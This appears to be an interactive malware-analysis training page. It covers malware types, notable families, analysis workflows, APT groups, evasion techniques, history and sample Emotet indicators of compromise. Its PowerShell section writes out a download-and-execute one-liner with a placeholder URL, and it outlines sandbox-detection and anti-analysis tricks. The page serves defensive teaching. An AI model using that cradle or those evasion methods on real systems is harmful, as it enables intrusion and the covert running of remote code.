Malware Analysis Lab
75 XP Available
Overview
Malware Types
Malware Zoo
Analysis Lab
APT & Advanced Threats
Components
Evasion Techniques
History
IOCs
Quiz Malware Fundamentals
Malware (malicious software) is an umbrella term encompassing any software intentionally designed to cause damage to computers, servers, clients, or computer networks. Understanding malware is essential for cybersecurity professionals to protect systems and conduct forensic investigations.
Core Malware Categories
- Trojans: Disguised malware that appears legitimate but performs malicious actions
- Viruses: Self-replicating code that requires user action to spread
- Worms: Self-propagating malware that spreads without user interaction
- Ransomware: Encrypts victim files and demands payment for decryption
- Adware: Displays unwanted advertisements, often bundled with legitimate software
- Spyware: Covertly gathers user information without consent
- Rootkits: Provides privileged access while hiding its presence
- Fileless Malware: Operates in memory without traditional files
Malware Lifecycle
- Delivery: Email attachments, drive-by downloads, USB drives, social engineering
- Execution: Exploiting vulnerabilities, user interaction, auto-execution
- Persistence: Registry modification, scheduled tasks, service installation
- Privilege Escalation: Exploiting system vulnerabilities for higher access
- Command & Control (C2): Establishing communication with attacker servers
- Objective Execution: Data theft, encryption, lateral movement, destruction
Legal Warning
The techniques and tools discussed in this module are for educational and defensive purposes only. Unauthorized deployment of malware or conducting malware analysis on systems you don't own is illegal and unethical.
Learning Objectives
Identification
Learn to identify different malware types based on behavior patterns and characteristics.
Analysis Techniques
Master static and dynamic analysis methodologies for malware examination.
Defense Strategies
Understand prevention, detection, and mitigation strategies.
Threat Intelligence
Utilize IOCs and threat intelligence for proactive defense.
Comprehensive Malware Classification
Trojans High Threat
Trojans are malicious programs disguised as legitimate software. Unlike viruses, they do not self-replicate but rely on social engineering to trick users into execution.
Trojan Subcategories:
- Backdoor Trojans: Provide remote access to compromised systems (e.g., NetBus, SubSeven)
- RATs (Remote Access Trojans): Full remote control with keylogging, screen capture, file transfer (e.g., DarkComet, NanoCore)
- Banking Trojans: Steal financial credentials (e.g., Zeus, Emotet, TrickBot)
- Downloader Trojans: Download and install additional malware
- DDoS Trojans: Recruit systems into botnets for distributed attacks
- Proxy Trojans: Use victim's system as proxy for anonymous activities
Viruses High Threat
Self-replicating malware that attaches itself to clean files and spreads when the infected file is executed. Requires user action to propagate.
Virus Types:
- File Infector: Attaches to executable files (.exe, .com)
- Macro Virus: Embedded in documents (Word, Excel macros)
- Boot Sector Virus: Infects master boot record
- Polymorphic Virus: Changes code signature to evade detection
- Metamorphic Virus: Completely rewrites itself with each infection
- Stealth Virus: Hides modifications and intercepts antivirus queries
Worms Critical Threat
Self-propagating malware that spreads across networks without user interaction. Can cause massive damage by consuming bandwidth and system resources.
Notable Characteristics:
- Exploits network vulnerabilities and security flaws
- Spreads rapidly across interconnected systems
- Often carries additional payloads (ransomware, backdoors)
- Examples: WannaCry, NotPetya, Conficker, Blaster
Ransomware Critical Threat
Encrypts victim's files and demands ransom payment (usually cryptocurrency) for decryption key.
Ransomware Evolution:
- Crypto-Ransomware: Encrypts files (CryptoLocker, Ryuk, REvil)
- Locker Ransomware: Locks users out of systems
- Double Extortion: Encrypts AND exfiltrates data, threatens public release
- Ransomware-as-a-Service (RaaS): Ransomware operations offered to affiliates
Spyware & Adware Medium Threat
Spyware
Covertly monitors user activity, stealing passwords, browsing history, and sensitive data.
Adware
Displays unwanted advertisements, redirects searches, and tracks browsing behavior for revenue generation.
Fileless Malware Critical Threat
Memory-resident malware that operates without traditional executable files, making detection extremely difficult.
Characteristics:
- Living-off-the-Land (LotL): Uses legitimate system tools (PowerShell, WMI, PsExec)
- Memory-only execution: Never touches disk in traditional form
- Registry abuse: Stores malicious code in registry keys
- Script-based attacks: JavaScript, VBScript, PowerShell exploitation
- Examples: PowerGhost, Astaroth, Operation Cobalt Kitty
| Malware Type | Self-Replicating | User Action Required | Primary Objective | Threat Level |
|---|---|---|---|---|
| Virus | Yes | Yes | Spread & Damage | High |
| Worm | Yes | No | Rapid Propagation | Critical |
| Trojan | No | Yes | Remote Access/Theft | High |
| Ransomware | No | Varies | Financial Extortion | Critical |
| Spyware | No | Yes | Data Theft | Medium |
| Fileless | Varies | Varies | Stealth Operations | Critical |
The Malware Zoo - Specimen Collection
Interactive collection of notable malware specimens. Click each card to learn behavioral patterns and detection signatures.
WannaCry Critical
Ransomware worm that exploited EternalBlue (SMBv1) vulnerability. Infected 230,000+ computers in 150 countries in May 2017.
Emotet Critical
Modular banking Trojan turned malware-as-a-service platform. Polymorphic with sophisticated evasion techniques.
Stuxnet Critical
Nation-state worm targeting SCADA systems. First known cyber weapon designed to cause physical damage to industrial infrastructure.
DarkComet RAT High
Remote Access Trojan with keylogging, webcam access, file management, and password recovery capabilities.
Zeus/Zbot High
Banking Trojan stealing credentials via form-grabbing and keystroke logging. Source code leaked in 2011, spawning numerous variants.
PowerGhost Critical
Fileless cryptomining malware using PowerShell and WMI. Spreads via EternalBlue and mimikatz credential theft.
Ryuk Critical
Targeted ransomware used in big-game hunting attacks against enterprises. Manually deployed after network reconnaissance.
Conficker High
Computer worm exploiting Windows vulnerabilities. Created one of the largest botnets with 9-15 million infected computers.
NotPetya Critical
Destructive wiper malware disguised as ransomware. Caused $10+ billion in damages, targeting Ukrainian organizations primarily.
Malware Analysis Methodologies
Static Analysis vs Dynamic Analysis
| Aspect | Static Analysis | Dynamic Analysis |
|---|---|---|
| Definition | Examining malware without executing it | Observing malware behavior during execution |
| Safety | Safe - no execution risk | Requires isolated environment (sandbox) |
| Tools | Disassemblers (IDA, Ghidra), hex editors, strings, PE analyzers | Sandboxes (Cuckoo, Any.run), debuggers (OllyDbg, x64dbg), process monitors |
| Information | Code structure, strings, imports, signatures | Network connections, file operations, registry changes, API calls |
| Evasion | Defeated by obfuscation, packing, encryption | Defeated by sandbox detection, time-based triggers |
| Time | Time-intensive for complex samples | Faster initial triage |
Static Analysis Workflow
- File Identification: File type, hash values (MD5, SHA256), size
- String Extraction: Extract readable strings for URLs, IPs, commands, registry keys
- PE Analysis: Examine headers, sections, imports, exports, resources
- Signature Scanning: YARA rules, antivirus signatures, IOC matching
- Disassembly: Reverse engineer assembly code to understand logic
- Deobfuscation: Unpack or decrypt protected code sections
Dynamic Analysis Workflow
- Environment Preparation: Isolated VM with monitoring tools
- Baseline Snapshot: Document clean system state
- Execution Monitoring: Run malware with comprehensive logging
- Behavioral Analysis: Observe processes, network, filesystem, registry
- Memory Analysis: Dump and analyze process memory
- Network Analysis: Capture traffic, identify C2 servers, protocols
- Artifact Collection: Dropped files, created services, scheduled tasks
Essential Analysis Tools:
- Static: IDA Pro, Ghidra, PEStudio, PE Explorer, CFF Explorer, strings, YARA
- Dynamic: Cuckoo Sandbox, Any.run, Process Hacker, Process Monitor, Wireshark, Fakenet-NG
- Debuggers: OllyDbg, x64dbg, WinDbg, GDB
- Memory: Volatility Framework, Rekall, WinDbg
- Network: Wireshark, TCPDump, Fiddler, BurpSuite
Interactive Analysis Simulator
Select a malware sample to perform simulated analysis. This demonstrates the analysis workflow without executing real malware.
Banking Trojan
Ransomware
Fileless Malware
RATSandboxing Best Practices
Isolation Requirements:
- Use dedicated hardware or virtualization (VMware, VirtualBox, Hyper-V)
- Disable shared folders and clipboard between host and VM
- Use isolated network (air-gapped or controlled virtual network)
- Take snapshots before analysis for easy restoration
- Monitor for VM escape attempts and sandbox detection
- Use different analysis environments to detect environment-specific behavior
Behavioral Indicators to Monitor
Process Activity
- Process creation/termination
- Process injection techniques
- Parent-child relationships
- Unusual system processes
File System
- File creation/modification/deletion
- Dropped executables
- Temporary file usage
- Encryption activities
Registry
- Autorun key modifications
- Service creation
- Configuration changes
- Security policy modifications
Network
- C2 communications
- Data exfiltration
- DNS requests
- Port scanning activities
Advanced Persistent Threats (APT)
APT Characteristics
Advanced Persistent Threats are prolonged and targeted cyberattacks where attackers gain access to a network and remain undetected for extended periods. Typically nation-state sponsored or highly organized criminal groups.
APT Defining Attributes
Advanced
Sophisticated techniques including zero-day exploits, custom malware, social engineering, and multi-stage attacks.
Persistent
Long-term presence with multiple backdoors, re-infection mechanisms, and continuous monitoring capabilities.
Threat
Specific objectives: espionage, intellectual property theft, infrastructure disruption, or strategic advantage.
Organized
Well-funded teams with specialized roles, operational security, and coordinated campaigns.
APT Attack Lifecycle (Kill Chain)
- Reconnaissance: Information gathering about targets, infrastructure, personnel
- Initial Compromise: Spear-phishing, watering hole attacks, supply chain infiltration
- Establish Foothold: Deploy backdoors, create persistence mechanisms
- Escalate Privileges: Exploit vulnerabilities to gain administrative access
- Internal Reconnaissance: Map network, identify valuable targets
- Lateral Movement: Spread to other systems using compromised credentials
- Maintain Presence: Install additional backdoors, update malware
- Complete Mission: Data exfiltration, destruction, or long-term monitoring
Notable APT Groups
APT28 (Fancy Bear) Critical
Russian military intelligence (GRU). Targets governments, military, security organizations. Known for DNC breach.
APT29 (Cozy Bear) Critical
Russian Foreign Intelligence (SVR). SolarWinds supply chain attack. Sophisticated stealth operations.
Lazarus Group Critical
North Korean state-sponsored. WannaCry, Sony Pictures hack, SWIFT attacks. Financial motivation and disruption.
APT41 (Double Dragon) Critical
Chinese state-sponsored with criminal operations. Dual espionage and financial gain. Healthcare, telecom, gaming targets.
APT1 (Comment Crew) High
Chinese PLA Unit 61398. First publicly attributed APT group. Massive intellectual property theft campaign.
Equation Group Critical
NSA-linked. Most sophisticated APT group. EternalBlue exploit, firmware implants, decades of operations.
APT Defense Strategies
- Threat Intelligence: Subscribe to APT indicators, MITRE ATT&CK framework mapping
- Network Segmentation: Limit lateral movement with proper network zoning
- Endpoint Detection & Response (EDR): Advanced behavioral monitoring
- Zero Trust Architecture: Verify every access request, never assume trust
- Privileged Access Management: Strict control over administrative credentials
- Security Information & Event Management (SIEM): Centralized log analysis
- Regular Threat Hunting: Proactive search for IOCs and anomalous behavior
- Incident Response Planning: Prepared playbooks for APT scenarios
APT Attribution Challenges
Attributing attacks to specific APT groups is complex due to:
- False flag operations and tool sharing between groups
- Use of compromised infrastructure obscuring true origin
- Political motivations affecting public attribution
- Sophisticated operational security by threat actors
Malware Components & Architecture
Modern malware operates using modular components that work together to achieve objectives while evading detection.
Dropper
Initial delivery mechanism that installs the main malware payload. Often disguised as legitimate software or documents.
Downloader
Downloads additional malware components from remote servers. Allows attackers to deploy stage-2+ payloads after initial compromise.
Loader
Loads malicious code into memory without writing to disk. Critical for fileless malware operations.
Crypter
Encrypts malware payload to evade signature-based detection. Decrypts at runtime for execution.
Packer
Compresses and obfuscates executable code. Makes reverse engineering and static analysis more difficult.
Obfuscator
Transforms code to hide its true purpose while maintaining functionality. Uses techniques like control flow flattening and string encryption.
Exploit
Code that takes advantage of vulnerabilities to gain unauthorized access or elevate privileges.
Payload
The actual malicious functionality - what the malware does after gaining access (ransomware encryption, data theft, etc.).
Backdoor
Provides persistent remote access to compromised systems, bypassing normal authentication mechanisms.
C2 (Command & Control)
Communication infrastructure for attackers to send commands and receive data from compromised systems.
Rootkit
Hides malware presence by intercepting system calls and modifying OS behavior. Can operate at kernel or user level.
Keylogger
Records keystrokes to capture passwords, credit card numbers, and other sensitive typed information.
Multi-Stage Attack Architecture
Stage 1: Initial Access
- Small dropper/downloader delivered via phishing email
- Minimal functionality to avoid detection
- Establishes connection to C2 server
Stage 2: Payload Deployment
- Downloads main malware components
- Establishes persistence mechanisms
- Begins reconnaissance of local system
Stage 3: Privilege Escalation
- Exploits vulnerabilities for higher access
- Credential dumping and lateral movement preparation
- Disables security software
Stage 4: Objective Execution
- Deploy final payload (ransomware, data exfiltration tool, etc.)
- Execute primary attack objective
- Maintain access for future operations
Common Obfuscation Techniques
| Technique | Description | Detection Difficulty |
|---|---|---|
| String Encryption | Encrypts strings (URLs, commands) and decrypts at runtime | Medium |
| Control Flow Flattening | Transforms code into switch/case statements obscuring logic flow | High |
| Dead Code Injection | Inserts non-functional code to confuse analysis | Low |
| Code Virtualization | Converts code to custom bytecode executed by embedded VM | Critical |
| Polymorphism | Changes code signature while maintaining functionality | High |
| Metamorphism | Completely rewrites code with each generation | Critical |
Detection Evasion Techniques
Educational Purpose Only
Understanding evasion techniques is crucial for defenders to build effective detection mechanisms. This knowledge should only be used for defensive security purposes.
Anti-Virus (AV) Evasion
Signature Evasion
Modify code to avoid matching known malware signatures in AV databases.
Behavioral Evasion
Avoid triggering heuristic and behavioral detection by mimicking legitimate software patterns.
Fileless Execution
Run malicious code entirely in memory without writing files to disk.
Living-off-the-Land
Use legitimate system tools and binaries for malicious purposes (LOLBins).
Sandbox Detection & Evasion
Environmental Checks:
- VM Detection: Check for VMware tools, VirtualBox drivers, hypervisor artifacts
- System Resources: Verify RAM > 4GB, multiple CPU cores, realistic disk size
- Running Processes: Detect analysis tools (Process Monitor, Wireshark, debuggers)
- User Activity: Check for mouse movements, recent files, browsing history
- Time-based Triggers: Delayed execution or specific date/time activation
- Geographic Checks: Verify target location, language, timezone
- Network Connectivity: Internet connection tests, DNS resolution checks
Anti-Analysis Techniques
| Technique | Target | Method |
|---|---|---|
| Anti-Debugging | Debuggers | IsDebuggerPresent(), timing checks, exception handling, debug registers |
| Anti-Disassembly | Reverse Engineering | Junk code, fake conditional jumps, overlapping instructions |
| Code Obfuscation | Static Analysis | Control flow flattening, string encryption, API hashing |
| Packing | Signature Detection | UPX, Themida, VMProtect, custom packers |
| Process Injection | Process Monitoring | DLL injection, process hollowing, APC injection, reflective DLL |
| Rootkit Techniques | System Visibility | SSDT hooking, IRP hooking, DKOM (Direct Kernel Object Manipulation) |
Network Evasion
Protocol Tunneling
Hide malicious traffic inside legitimate protocols (DNS, HTTPS, ICMP)
Domain Generation Algorithms (DGA)
Generate thousands of domain names for C2, making blocklisting ineffective
Fast Flux Networks
Rapidly change DNS records to hide C2 infrastructure
Encrypted Communications
Use TLS/SSL encryption to hide C2 traffic from network inspection
Steganography
Hide commands and data within images, videos, or other files
Timing Randomization
Random delays between beacons to avoid pattern detection
PowerShell Attack Techniques
Common PowerShell Exploitation Methods:
- Download Cradles:
IEX (New-Object Net.WebClient).DownloadString('url') - Encoded Commands: Base64 encoding to bypass command-line logging
- Reflective PE Injection: Load executables directly into memory
- Empire/Metasploit Frameworks: Post-exploitation PowerShell frameworks
- AMSI Bypass: Techniques to disable Anti-Malware Scan Interface
- PowerView/BloodHound: Active Directory reconnaissance tools
Defensive Countermeasures
Detecting Evasion Attempts:
- Behavioral Analysis: Monitor for suspicious API call sequences
- Memory Scanning: Inspect process memory for malicious code
- PowerShell Logging: Enable script block and transcription logging
- Constrained Language Mode: Restrict PowerShell capabilities
- Application Whitelisting: Only allow approved executables
- YARA Rules: Create signatures for evasion technique patterns
- Honeypots: Deploy decoy systems to detect reconnaissance
- Network Traffic Analysis: Baseline normal traffic, detect anomalies
Malware Evolution Timeline
A historical journey through significant malware incidents that shaped cybersecurity.
Creeper - First Computer Worm
Experimental self-replicating program on ARPANET displaying "I'M THE CREEPER : CATCH ME IF YOU CAN". Led to creation of Reaper, the first antivirus.
Brain - First PC Virus
First boot sector virus for IBM PCs, created by Pakistani brothers. Infected floppy disks and displayed creators' contact information.
Morris Worm
First major Internet worm affecting 10% of connected computers (~6,000). Creator Robert Morris became first person convicted under Computer Fraud and Abuse Act.
Melissa Virus
Macro virus spread via email, mass-mailing itself to first 50 contacts. Caused $80 million in damages. One of first social engineering-based malware.
ILOVEYOU Worm
Love letter-themed email worm infected 45 million users in one day. Caused $10 billion in damages, overwhelming email servers globally.
Blaster Worm
Exploited Windows DCOM RPC vulnerability. Self-propagating worm that targeted Microsoft's update servers. Infected 1.5+ million systems.
Zeus Banking Trojan
Sophisticated credential-stealing malware targeting banking information. Source code leak led to numerous variants. Estimated losses over $100 million.
Stuxnet
First publicly known cyber weapon. Nation-state worm targeting Iranian nuclear facilities. Used multiple zero-days and compromised digitally signed drivers.
CryptoLocker Ransomware
First widespread ransomware using strong encryption. Demanded Bitcoin payments. Launched ransomware era causing billions in damages.
Sony Pictures Hack
Attributed to Lazarus Group (North Korea). Destructive attack wiping systems and leaking confidential data. First major destructive cyber attack on US company.
Mirai Botnet
IoT botnet infecting millions of devices with default credentials. Launched massive DDoS attacks taking down major Internet infrastructure.
WannaCry Ransomware
Global ransomware outbreak using EternalBlue exploit. Infected 230,000+ computers across 150 countries. Caused billions in damages to healthcare, logistics, governments.
NotPetya
Destructive wiper disguised as ransomware. Supply chain attack via Ukrainian accounting software. Caused $10+ billion in damages globally.
SolarWinds Supply Chain Attack
APT29 compromised SolarWinds Orion update mechanism, affecting 18,000+ organizations including US government agencies. Most sophisticated supply chain attack discovered.
Colonial Pipeline Ransomware
DarkSide ransomware group attacked US fuel pipeline, causing shutdown and fuel shortages. Led to increased focus on critical infrastructure security.
Indicators of Compromise (IOCs)
IOCs are forensic artifacts that suggest a system has been compromised. Understanding and collecting IOCs is essential for threat detection and incident response.
IOC Categories
Network Indicators
- IP Addresses: C2 server IPs, malicious hosts
- Domains: C2 domains, DGA domains
- URLs: Malware download links, phishing pages
- Email Addresses: Phishing senders, C2 addresses
- Protocols: Unusual ports, protocol anomalies
Host-Based Indicators
- File Hashes: MD5, SHA1, SHA256 of malware
- File Paths: Locations of malicious files
- File Names: Dropped file names
- Registry Keys: Persistence mechanisms
- Mutex Names: Unique malware identifiers
Behavioral Indicators
- Process Names: Malicious processes
- Services: Installed malicious services
- Scheduled Tasks: Persistence tasks
- DLL Loads: Injected libraries
- API Calls: Suspicious API sequences
Artifacts
- Log Entries: Suspicious event logs
- User Agents: Malware HTTP user agents
- Certificates: Malicious code signing certs
- PDB Paths: Debug symbols from malware
- Strings: Unique malware strings
Example IOC Collection - Emotet
Network IOCs:
185.184.25.78:443 (C2 Server)190.90.233.66:80 (C2 Server)hxxp://malicious-domain[.]com/invoice.doc (Phishing URL)File IOCs:
SHA256: 3a5c9b8f7e2d1a0b9c8e7f6d5a4b3c2e1f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6cFile: %AppData%\Local\Microsoft\Windows\INetCache\invoice.exeRegistry IOCs:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdateBehavioral IOCs:
Process: powershell.exe -encodedCommand [base64]Network: Beaconing every 60 seconds to C2
IOC Sharing Formats
| Format | Description | Use Case |
|---|---|---|
| STIX/TAXII | Structured Threat Information eXpression / Trusted Automated eXchange | Enterprise threat intelligence sharing |
| OpenIOC | Open framework for sharing IOCs in XML format | Incident response, forensic investigations |
| YARA | Pattern matching rules for malware identification | Malware detection and classification |
| CSV/JSON | Simple structured data formats | Custom tooling, SIEM ingestion |
| MISP | Malware Information Sharing Platform | Collaborative threat intelligence platform |
IOC Lifecycle Management
- Collection: Gather IOCs from malware analysis, threat intelligence feeds, incident response
- Validation: Verify accuracy and reduce false positives
- Enrichment: Add context (threat actor, campaign, TTPs)
- Distribution: Share via SIEM, IDS/IPS, firewalls, EDR platforms
- Monitoring: Continuous scanning for IOC matches
- Aging: Retire outdated IOCs to prevent alert fatigue
- Feedback Loop: Update based on detections and new intelligence
IOC Limitations
- Easy to Change: Attackers can modify infrastructure quickly
- False Positives: Legitimate traffic may match IOCs
- Point-in-Time: IOCs represent past compromise, not current threats
- Context Required: IOCs alone don't explain attack methodology
Solution: Combine IOCs with behavioral analytics and TTPs (Tactics, Techniques, Procedures) using frameworks like MITRE ATT&CK.
Comprehensive Malware Analysis Quiz
Test your knowledge with 15 challenging questions covering all aspects of malware analysis.